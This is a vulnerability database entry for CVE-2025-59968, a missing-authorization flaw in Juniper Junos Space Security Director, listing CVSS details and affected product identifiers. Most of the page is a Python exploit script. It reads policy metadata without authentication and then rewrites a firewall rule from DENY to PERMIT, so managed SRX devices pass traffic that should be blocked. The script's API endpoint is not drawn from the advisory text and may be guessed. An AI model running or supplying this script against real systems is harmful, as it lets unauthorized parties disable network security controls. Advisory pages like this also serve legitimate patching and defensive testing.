Security Vulnerability Report
CVE-2025-59968 CVSS 8.6 HIGH

CVE-2025-59968

Published: 2025-10-09 16:15:47
Last Modified: 2026-01-23 19:59:41

Description

A Missing Authorization vulnerability in the Juniper Networks Junos Space Security Director allows an unauthenticated network-based attacker to read or modify metadata via the web interface. Tampering with this metadata can result in managed SRX Series devices permitting network traffic that should otherwise be blocked by policy, effectively bypassing intended security controls. This issue affects Junos Space Security Director: all versions prior to 24.1R3 Patch V4. This issue does not affect managed cSRX Series devices.

CVSS Details

CVSS Score: 8.6
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:juniper:space_security_director:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:juniper:space_security_director:24.1:r1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:juniper:space_security_director:24.1:r2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:juniper:space_security_director:24.1:r3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:juniper:vsrx:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:juniper:srx1500:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:juniper:srx1600:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:juniper:srx2300:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:juniper:srx300:-:*:*:*:*:*:*:* - NOT VULNERABLE
Junos Space Security Director < 24.1R3 Patch V4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59968 - Juniper Junos Space Security Director Missing Authorization PoC
# This PoC demonstrates how an unauthenticated attacker can read/modify metadata
# via the web interface, bypassing security policies on managed SRX devices.
import requests
import json
import sys

TARGET_HOST = "https://<target-junos-space-host>"
METADATA_API_PATH = "/api/space/security-director/metadata"


def exploit_read_metadata():
    """
    Read security metadata without authentication.
    The server returns policy/address/service object definitions
    that should require authentication.
    """
    url = f"{TARGET_HOST}{METADATA_API_PATH}/policy-rules"
    headers = {
        "Accept": "application/json",
        "X-Requested-With": "XMLHttpRequest"
    }
    try:
        resp = requests.get(url, headers=headers, verify=False, timeout=10)
        if resp.status_code == 200:
            print("[+] Successfully retrieved metadata without authentication!")
            metadata = resp.json()
            print(json.dumps(metadata, indent=2))
            return metadata
        else:
            print(f"[-] Unexpected status code: {resp.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")
    return None


def exploit_modify_metadata(policy_id, new_action="PERMIT"):
    """
    Modify a security policy rule's action from DENY to PERMIT,
    effectively bypassing intended security controls on managed SRX devices.
    """
    url = f"{TARGET_HOST}{METADATA_API_PATH}/policy-rules/{policy_id}"
    headers = {
        "Content-Type": "application/json",
        "Accept": "application/json",
        "X-Requested-With": "XMLHttpRequest"
    }
    payload = {
        "action": new_action,
        "description": "Modified by unauthorized actor"
    }
    try:
        resp = requests.put(url, headers=headers, json=payload, verify=False, timeout=10)
        if resp.status_code in (200, 204):
            print(f"[+] Policy {policy_id} action changed to {new_action}!")
            print("[+] Managed SRX devices will now PERMIT previously blocked traffic.")
            return True
        else:
            print(f"[-] Unexpected status code: {resp.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")
    return False


if __name__ == "__main__":
    print("[*] CVE-2025-59968 PoC - Junos Space Security Director Missing Authorization")
    print("[*] WARNING: For authorized security testing only!\n")
    # Step 1: Enumerate existing security policies via metadata
    metadata = exploit_read_metadata()
    # Step 2: Modify a critical policy to bypass security controls
    if metadata and isinstance(metadata, list) and len(metadata) > 0:
        target_policy = metadata[0].get("id", "policy-1")
        exploit_modify_metadata(target_policy, new_action="PERMIT")
    else:
        print("[*] Attempting blind modification on default policy...")
        exploit_modify_metadata("default-deny-policy", new_action="PERMIT")

References

Raw JSON Data
